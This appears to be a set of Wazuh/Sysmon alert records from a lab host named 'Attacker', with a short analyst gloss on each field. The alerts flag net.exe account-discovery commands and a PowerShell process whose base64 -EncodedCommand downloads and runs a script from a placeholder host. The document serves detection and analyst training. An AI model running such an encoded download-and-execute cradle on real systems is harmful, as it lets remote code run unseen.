data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1022997 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.4155645Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282309 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.411
ProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00}
ProcessId: 4344
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.411 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-be0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4344 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1028244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.6519336Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282313 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.645
ProcessGuid: {94294ddc-bcca-680a-c00a-000000000e00}
ProcessId: 8816
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00}
ParentProcessId: 4344
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.645 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-c00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4344 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1033317 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.7314204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282317 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.726
ProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00}
ProcessId: 2332
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.726 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-c10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1038550 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:58.9771958Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282377 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:53.808
ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ProcessId: 2176
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ParentProcessId: 9592
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:53.808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2176 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
